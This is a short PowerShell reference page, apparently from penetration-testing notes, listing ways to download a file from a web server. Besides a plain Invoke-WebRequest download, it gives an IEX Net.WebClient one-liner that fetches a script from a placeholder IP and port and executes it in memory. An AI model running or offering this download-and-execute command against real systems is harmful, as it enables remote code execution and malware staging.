Powershell Cheat Sheet


Download File From Webserver

Invoke-WebRequest -Uri [target url] -Outfile [location on local host to save file]

powershell "IEX(New-Object Net.WebClient).downloadstring('http://[IP]:[Port]/filename')"

Back to Homepage